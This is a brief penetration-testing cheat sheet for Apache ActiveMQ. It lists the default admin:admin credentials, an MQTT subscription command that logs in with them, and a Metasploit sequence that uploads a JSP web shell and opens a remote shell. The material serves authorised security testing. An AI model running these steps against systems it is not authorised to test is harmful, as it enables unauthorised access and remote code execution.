Apache ActiveMQ Pentesting

Apache ActiveMQ is a message broker written in Java together with a full Java Message Service client.

Default Credentials

admin:admin

Interaction with MQTT

If the MQTT server is runnong on the target system, we can subscribe/publish to a topic in ActiveMQ using MQTT client.

Subscribe to a Topic

# -h: Host
# -t: Topic name
# -V: MQTT protocol version (5, 31, 311)
mosquitto_sub -h example.com -u admin -P admin -t 'example/topic' -V 31

Web Shell by File Upload JSP

ActiveMQ is vulnerable to web shell via file upload an arbitrary JSP file.

msfconsole
msf> use exploit/multi/http/apache_activemq_upload_jsp
msf> set ...
msf> run
meterpreter> shell